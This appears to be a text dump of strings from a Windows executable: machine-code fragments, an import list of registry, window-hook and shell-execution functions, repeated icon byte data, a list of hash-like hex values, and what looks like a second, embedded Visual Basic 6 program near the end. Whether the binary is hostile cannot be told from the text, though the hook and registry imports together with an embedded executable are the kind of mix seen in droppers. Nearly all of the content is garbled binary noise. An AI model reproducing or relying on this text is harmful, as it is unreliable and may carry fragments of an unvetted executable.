HX<QPWT3C@P
X<QPWT@
<8O<D0QPhM
@PqG|2F
VS^_3[]
VWEZ3X}uZ`jZ_ZTZ(IZ
((7F&F
FXXEEM_d
SVWXEX3}XWWh
S!t!xho
SW3EX\ho
T}J<;u
=((=XX=
=``n=]=MT
VXE.P3j
*9;u)E
y4XX7_[Md
VXEJ3j
#4;u)HE
3;v:9,
XPt9(
3+tSHt=Ht'Ht
?3_[Md
PQXP E
H@@<RQP
XTI@5|o
@4PDSa
@34Q@PWTH
@X4QPWTH
@X4QPWTH
@X4QPWTH
@X4QPWTH
X4QPWT
PLWTSPh
LPPWTPh
SuPHPh
tKWPhI
X6PXP$09H
vLWPhQ
XP4XP,9x
vLWPhJ
XPXP|,9
vLWPhK
XPXP(,9
vLWPhL
XP8XP,`
#tiWPhM
XPXPc
#XX#M^d
XT63SjdX]W"j
tVWXPhN
t!tVWXPhO
PTXPV|
!tOWXPhP
QTPP09Lt0WXPh[
PTXPV @]bX
t!M_^d
WXT(A4F
(v1Wjd(E
4/X}&/E
VPjdWkX
VXPjrW[X
j0d5po
VXPjdWW
VPjdWE
VXPjrW%W
j0d5po
3@M_^d
VXPjdWE
$`Y`VPhs
VXPjdWE
,j0d4W
X/)($)
V(PjdWE
j04dW
SVW33G;EE
xPPtPS|t
(&]&&X&
V(PjdSE
(R#X}D#9#
3@M_^d
W3WS S
EPuWSj
3uLPho
PjgYYj
;tc90t_Vj
VPjdS@
}*VXPjrj
j0d5po
VPjdSY?
PP}*VXPjrj
j0d5po
VPjdS&>
P}*VXPjrj
j0d5po
VPjdS<
P;})VXPjrSX<
j0d5po
+tGHt5Ht#Ht
df8hCVXPhO
+VXPhN
V(PjdWE
VPjrWN9
j045po
YY2XX!
(PXch`Q
(PXh`Q
((wXXfM_^d
df0\Ph
uijdhQ
9hv=LPPPTPXPhQ
Vjn[hQ
f04V5po
XX((|``kZI8Md
u<EPSj
UDSVWh
EEP5po
W3WuEP
E+EWPE+EPE+E
EPW5to
+V4YJ\`
+Vs;5``
3_^[;5l`
SWE30}j
f8@@f98uVW
Wd45po
X``UV`Ph
V(PjnW%
Wld5po
9,(t hR
Xb(WV(Ph
V`PjnW#
W4d5po
((JXX9(
P3Vh<L
M3Fx5Ho
VVWUYu\3A9
VVdV5po
vTl3|j
WXPjdVE
Vd5po
jqYYxMh
WPjd3VE
WXPjiV
j0d5po
W(PjdVE
ddP+@j
XXn]L((;3VVh/
;t?95o
SWPj5|o
SXPjlVE
S(PjdV3
PWdPo095
((XXMl
W3WWEE
uK\Ph`
`PWh4S
v*GGf? w f="
dGtpWq
dstpW,
W'@Pj.} =o
&39u9=o
4PjsWc
NYYShN
t7ShTN
YYShTN
t7Sh(N
YYSh(N
V4Pjd3W
FYYShN
t7ShTN
YYShTN
t7Sh(N
~YYSh(N
twf}66
t7ShTN
YYShTN
t7Sh(N
PYYSh(N
uG`P3PPh
Wdt@Pj d~
lPjfVz
fd[PM_^[w
fDV*^]
_3_^[]
URuPQT|+}
URuPQT|+}
U SVW3S
UREuTq
|P9]tKEP]
PQHE;t
dE{VdXpG
YYu#9`u
YM_^[m
PqXPWV6
W3}X(hZ
`((OXX>-
S df8o
VXWWPX>Yo
;t=PhxU
VX`WWPXXo
;t=PhHU
WWPXXo
VXWWPXlXo
;t=PhT
VXWWPX&Xo
;t=PhT
VXHWWPXWo
;t=PhT
WWPXW9ht_hxT
WWXP(GW4hDT
CdDdPWphZ
804W,E
;LtHXP
P0XPht\
8;t1XQ
PXPh`\
D;t1XQ
PXPhL\
H;t1XQ
PuXPh4\
P;Lu<;
P;Lu8;t+hD[
TD;t+h
TH;t+hZ
XET,23
40TPh^
,YYP;H
SVWXET
P0DPh^
SyYY^W3Gt
t+Ht!Ht
+t+Ht!Ht
YYhPd
PiK -f
Y|jv(T,u
WpVWis
WJ3098
RPTDHQv<Ph0s
YYhPd
VXJOuXP
7v!;hs
XX{M_^d
3SEEEA
E0EPhx
SV3;WE
WVW37(
W/YYhPd
WLVWEs
WYY3M_^d
SVW3;E
@PaPh0
YYt"7h
WSm0Xe
@Pj\y~
y3M_^d
PX4XPhx
PXyXPhx
PX$XPhx
PXiXPhx
P(lh,T
\ 3*qM_^d
E0EPh0
E0EPh0
YY^ltD`
W~VWws
WSYY3_^
PX:zXPh
PXyXPh\
dXXd$b
YYhPd
3((*`M_^d
XHTPrHPhH
PV;YYt
PVh;YYt
PV<;YYt
PX`lHXPh
V@YYh
XPVWV^h
XPViWV
X3M_^d
WXTDk3
Hu3d(hh
TYYh,T
nT``]T\
T#YYh,T
SS((SXXSM_^d
ZN48V0E
NLPVHE
NptVlE
2O@DV<E
hO(,V$E
OdhV`E
PX\VTE
|q!|^%|K=Pq
Wffffff
YY]j`h
3{FF3f
FFW](j
w\SVP9
YE;t:FHE;r
9}uX;u
E;t0FHE;r
9}u";u
EE;u`9=t
3CSVW5`
UQQSVWd5
SVWE3PPPuu
E_^[E]
USVWUj
P(RP$R
t5|$(t
;t$(v(4v
UQPXY]Y[
@@fu+E
fSt8+f
@@fu3[_]
@@fufM
HLNLHPNPP3Y`
vPVLPQE
Y3^_[]
AABBM
tJf9}tDf9Et<}
3F95xr
3MYY[]
31YY[]
SVEW3;
@u+@<v)P
UQSVW>
<"u>"u
3Y[^_5Xr
@B8\t8"u&
UQQSVW39=
W33;u.
;tuf9t
SSS+S@PWSSE;
;YEt!SSuPuWSS
uGY]]W
;rSVWEP
YYt(V5
PYF,;t
PYF4;t
PYF<;t
PYFD;t
PYFH;t
PYFT=pa
Y}F`E;t
FdE;tM
YYt+V5
3@^p3^
3]3@]h
+SVWEePEEEEd
Y_^[QVC20XC00U
33333]^]
]_^[]UL$
f;rof=p
f;r_f=Z
f;rOf=
rBPf;rAf=*
f;r1f=J
f;r!f=
3"p@d;
VDYYFu
WYYuf_]h0
PyYYtF
YYGG3f
YfdtSfitMfotGfxtAfXu
1ht lt
g~Bit!n
(j-_f;u
YtdV(PW
GGf?^u
f]t`FFf9s
jx^f;tZfXtT
S~YYj0[
ptBuf%
F$|3@_^
k3Y@_^]
W3;u4DP
MOI;|9M
WI <}}
MLD3#um
#Mj _^{
;]r;]u&
]#\D\D
FF@@u3
YYE@xE@|EpxM
EE8csmu%Ex
EPQ3VW
GuRYMHxMH|>csmu6~
tu$u u
WEPEPVu u
;EsVS;7|B;w
;Er[_^
Wcsm9>
}EPEPWu u
(u$u ]u
VYY_^[
u u$u uu
tP8csmu,9x
U$Ru u
P 3@_^]j
VW_^]M
It7ht&lt
HHtxHHtt
@@@u3@t
t-RPWS
CYCY~9PM
PvCC>Yt
j ^f;r
It6ht&lt
}]UZtg
@@@u3@t
t-RPWSH/
uH80t8
A80t.F
EVM(^[
uMSW<t
D=VP YYtG;|fE
YYM_^[@=
r$$w@
W=YEMT
tc;t_F,98uXF4;t
YYF0;t
YYv,}v<uYYF@;
PZvDRYYFP;
vP+YYV#Y_^]
3;t/A,
QoYFd^j
W>+~'WPv
7Y}3u;5@
tVPVDYY3BU y
qtb+tG
VbtFHt+
Y]3u;5@
4VYY y
GIt%t)
Gt/KuD$
GKu[^D$
VPVPV5v
@;rD3Ar
@;vAAy
YE;uo>
EtVMf9MZ
_^[j$h
33F9=lu
u2EPVh|
M3F]39}u
SVeYYE;tuWWSuu
P}YEtnu
fNPSuu
E_WEPE
UDSVWj
E3;}M]
@@Ju;t
;tD9]u?8\
EPSRWjQSv
M_^[.x
BG;U|E
EPSSSjQSv
;F(r(8_
t#F(39]
DDDDDDDDDDDDDD
;|P+;E
ue9t-j
*09)Y+
s9~(~
j YjY+
VWj Y}
PjY+3BR0H%
Yj^+3B
QP4YYu
<+3E_^[
|3@]3]
SVWj ^]
EPEPEWPv
@PEP 3;>v
|!3}MEP^
fYY3jY+N
3QQQEE
QPEPEP#
EVPM$^vh
3QQQEE
QPEPEP#
EVPdM$^.h
tAt2t$
@u+@PWV
EPVcM s
u5SSWh|
E SSSSu
]M3G9]u
YE;t}SSuuu
e33Mu;u
V?Y;thE
WreY9]t
ev$dv(dv,dv0dv4dv
dv8dv<d@v@dvDdvHdvLdvPdvTdvXdv\
dv`wdvdodvhgdvl_dvpWdvtOdvxGdv|?d@
PWcY^]
PbYv$Dk
VtbY^]UV3PPPPPPPPU
u5EP3GWh|
V`YEn}
e}UWVSM
[^_UV3PPPPPPPPU
t78t2=`
3@_^[]
PYYtbF
EEuzEE
YXS9YtJU
t1SaYP
t@ t20t$@t
/t(;t$;t
8EPuuu
uWEY>j
u|Yj4h@
u8WW3FVh|
YE;t@E
t!SS9]
u1VY9]t
E;tWWu
EPSu u
YMMjDhh
39}t WWu
tjEEb9}u
WWWWVSWu
;tG3Vj
YYE;t43WWVPVSWu
HHtjHHtF
u9S\UC\
}]39Mt
WVE;Yu
;VWEN@
vOE}SLSFEPSS6E
EMu39S
tfEM_^fC
+t5-t00
uFQ3@}
G0t1|
HHu&Mj
PQYuuO
#fEEEEEEEEEEEE?E
PEPfU}Y
EPMYu}
EPNYuO
EPoEPfEPEPEPPEM
0H;s;s
@UWVSu
F'G8t,A<
WN^xd;=g
tXSjYe
EPKYu}
u5}u,e
MuVQTYYM39U
6UWVSM
B8t6t8t't
M}M}M3~M~M~M#
M{M|@F
g~X\~`Q~F~;~(0~
~|UzpzG{LG
Tuy}`}}X}(}}G
Xt}y^}G
X}qzy|<H
X|@izH
(|Xu|j|_|XT|I|X>|3|X(|
x({{X{X{({lI
({{{p{Xe{I
(K{X@{5{I
w(]zRzJ
8zX-z"z K
z(yyy\K
yyy`y(yXyK
|y0qyfy[y(PyXEyX:y`/y$y(
y(xx`x<L
xmtXxxWtxXxxuxtX{xpx(exZxOxXDxxsltL
wwXw(wwPM
uOuX7wM
w`v(vXv
(vXwvlvN
XRvXGvN
X-v("v
q0qH&rlsr
s$Zs`sxsT#
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegEnumValueW
RegQueryInfoKeyW
RegOpenKeyExW
RegQueryValueExW
RegEnumKeyW
RegEnumKeyExW
RegDeleteKeyW
RegFlushKey
RegDeleteValueW
RegNotifyChangeKeyValue
ADVAPI32.dll
lstrlenW
EnterCriticalSection
InterlockedIncrement
LeaveCriticalSection
InterlockedDecrement
GetSystemDirectoryW
GetCurrentDirectoryW
InitializeCriticalSection
GetFileAttributesW
GetModuleFileNameW
DeleteCriticalSection
CloseHandle
HeapFree
HeapAlloc
GetProcessHeap
lstrcpyW
lstrcmpW
GetWindowsDirectoryW
CompareFileTime
lstrlenA
GetVersionExW
WaitForMultipleObjects
WaitForSingleObject
SetEvent
GetCurrentThreadId
FreeLibrary
LoadLibraryW
GetCommandLineW
CreateEventW
GetSystemInfo
GetFullPathNameW
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoA
GetCommandLineA
GetVersionExA
HeapReAlloc
RtlUnwind
ExitThread
TlsSetValue
TlsGetValue
GetLastError
CreateThread
ExitProcess
GetProcAddress
GetModuleHandleA
WriteFile
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
GetFileType
TlsFree
SetLastError
TlsAlloc
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
HeapSize
LoadLibraryA
GetACP
GetOEMCP
GetCPInfo
InterlockedExchange
VirtualQuery
GetStringTypeA
GetStringTypeW
VirtualProtect
MultiByteToWideChar
IsBadReadPtr
IsBadCodePtr
SetFilePointer
LCMapStringA
LCMapStringW
GetLocaleInfoA
SetStdHandle
FlushFileBuffers
CreateFileW
SetEndOfFile
ReadFile
KERNEL32.dll
GetTextExtentPointW
GDI32.dll
EnableWindow
SendMessageW
GetDlgItem
MessageBoxW
LoadStringW
wsprintfW
EndDialog
DialogBoxParamW
GetWindowLongW
CallNextHookEx
PostMessageW
IsWindowEnabled
GetKeyState
DestroyWindow
MessageBoxA
wsprintfA
LoadStringA
SetDlgItemTextW
ShowWindow
CheckDlgButton
SetWindowTextW
ReleaseDC
SetDlgItemInt
GetDlgItemInt
GetDlgItemTextW
CheckRadioButton
LoadIconW
SetForegroundWindow
KillTimer
SetTimer
SetFocus
GetFocus
SetWindowPos
AdjustWindowRectEx
GetWindowRect
CreateDialogParamW
GetClientRect
UpdateWindow
PostQuitMessage
UnhookWindowsHookEx
SetWindowsHookExW
DispatchMessageW
TranslateMessage
IsDialogMessageW
PeekMessageW
MsgWaitForMultipleObjects
GetDesktopWindow
USER32.dll
ImageList_Destroy
ImageList_ReplaceIcon
ImageList_Create
COMCTL32.dll
GetSaveFileNameW
comdlg32.dll
ShellExecuteW
SHELL32.dll
CoInitializeSecurity
CoInitialize
CoCreateInstance
CoUninitialize
ole32.dll
OLEAUT32.dll
Ix@oGAkU'9p|B
~QCv)/&D(
uuvHMXB
9;5SM]=];Z] T7aZ%]g']
?Zd;On
7?3=Bz
;1az?aUY~S|
D?$?9'
*?}d|FU>c{
zc%C1<!8G
u7.:3q
#2IZ9W
,%I-64OSk%Y
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJt))^!!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJt))^!!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJt))^!!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
<<<3l44e::FFWWggvv
UUU'88n..99KK\\rr
_ZZ322000022==IIYYjj||
HHG..%%$$
22<<NNaatt6))
II?&&
w00y??DDWWhhzz
~xx &&
"<`YYDDSSeevv}}~QQ1h
5Y}MMOOaarruuTT)''
*OnccMM\\iibbN))
>`}NNUU[[BB
%Lh[[HHHHN
.Pe;;00
1FgPPA--
N##DDdd
55MM\\eeuu
#9}66BBMMSSWWaa}}ww
<\JJ@@@@DDNNkkii
.Qq[[BB55;;[[ssYY
4Vl{AA//JJbbII
55iKK,,
,EP`,,??OO<<
))II>>
";%%66<<n66f!!!
<<MM//N
5544<<<3
GGm''+
++66::nCCC
66zRREEe##)
1199UUU'
>>UUEEf%%*
0066c__3
BBXXIIl,,1
++22HHG
??WWOOx;;J&&5
%%0011LL@
VVLL==11##
!!**220000~xx
''488HHSSQQKKEEBB>>==@@AA>>55--55H
!!//g::CC
GGJJJJFF>>
11++p33-
<<<3l44e::FFWWggvv
UUU'88n..99KK\\rr
_ZZ322000022==IIYYjj||
HHG..%%$$
22<<NNaatt6))
II?&&
w00y??DDWWhhzz
~xx &&
"<`YYDDSSeevv}}~QQ1h
5Y}MMOOaarruuTT)''
*OnccMM\\iibbN))
>`}NNUU[[BB
%Lh[[HHHHN
.Pe;;00
1FgPPA--
N##DDdd
55MM\\eeuu
"A56FEF968405E3FA8E2EFED7D055C9FB
149DD4FE3087466A536A3BA52AB85C84
19F63F2B6D10697F91CD22B562DECEE3
11F614FECA1A9A76324A20CF617C1099
48CFFA37EF597E92A52CF56F77A565F1
4BF45A7926E19D9370BCAB556B9BCCA0
4BF45A7926E19D9370BCAB556B9BCCA0
036CE93B90DAC08AF7CD2E90B4EE34C4
71E4E8C28B32637C807C1709F6635CD0
9C45DEA16AECFDDCB6F0A2809999CBE5
9C45DEA16AECFDDCB6F0A2809999CBE5
3D30F6E74C00F3A36020530184FB7EAE
B2B24A77CB831C4C335F0FC6DA0F3FC3
ACD8D4F938A3039CCC87730FDCF9783C
5BA96C292B42C577A803E3BCE1AF41F4
EC73298EF3489086273E6A422E92FBB2
DAC7C5F4450E7212D55356938EE141BE
9B571D7E0539F790AA24A1497657E93B
9BA7B2D56438DD1E5A2DBC0C26DBECCC
9ED60F7425F9B390322AEA09B758828B
A6CD91D7AB63DF54F84FFF4781E5073C
6DFC0B25704F6B6935FA7F98FC8E50C4
6B4EA2ED6F56FC0DC05D3F3142EE7958
9D0B13C641F33A70C42A1AE5E3A678D5
3DE1BF17B2E2469DF9B39CC3C15CF609
17FC52B24168BABC94C49C1024E8FCF9
0AC808DC135BF096E2764BEAAF45C40A
3144DCFA6FDB7082DB8197CDFD66E5C2
D01E78D2C8E4CA57FCD8EBC64FB8F165
A9439B4F830889DBA0F9287BBC634B87
15EDB54713F86F97C377F89D5998897F
D4233D0B5B0EB2A3BD93ADDE837F8FFB
D4233D0B5B0EB2A3BD93ADDE837F8FFB
11030D5F49B7EFF1269D629BDEDF572C
37CB2E7D66172092C2E5A7ED99B8BA5E
46B8246B170D6BB4BBF187A020935EE1
E96C3441E3BE663C51CD273F1F126282
6B8206675CA99595602CB95555080A41
15315CCC2F625C081C269F1665DB3882
043B6913EC40E5C09FDD0187F55F1356
CFFD3D0D5F34CEE1A5F93928752AE125
2305B3E0A250A53EB10F7C02FE24D2C9
BD67269AC6D46F54D9F2505D0936FA2D
06A987B724E092FFB4F615837284E83E
104B216A6940B9A3CFEEE090521DF5C3
A6E771607019E7A9E44D21C5F54902AE
L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlrr
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
